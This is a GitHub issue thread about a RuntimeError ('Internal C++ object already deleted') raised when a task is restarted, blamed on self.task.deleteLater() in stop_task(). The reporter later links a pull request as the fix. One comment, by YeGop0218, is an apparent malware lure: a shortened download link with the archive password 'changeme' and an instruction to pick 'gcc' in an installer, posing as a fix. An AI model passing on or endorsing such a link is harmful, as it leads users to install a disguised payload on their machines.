### ISSUE TITLE
Bug: RuntimeError on Task Restart

### ISSUE THREAD

**Issue by kferjaoui** [epoc-ed/GUI#47]
When attempting to restart a task after it has been stopped, a RuntimeError is consistently triggered. The error message suggests that the BeamFitTask (same for RecordTask and others...) object has been prematurely deleted.
``` RuntimeError: Internal C++ object (BeamFitTask) already deleted. ```
This error typically occurs due to the following line of code:
``` self.task.deleteLater() ```
located in the ```stop_task()``` method within task_manager.py.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by kferjaoui** [comment]
[PR#73](https://github.com/epoc-ed/GUI/pull/73)
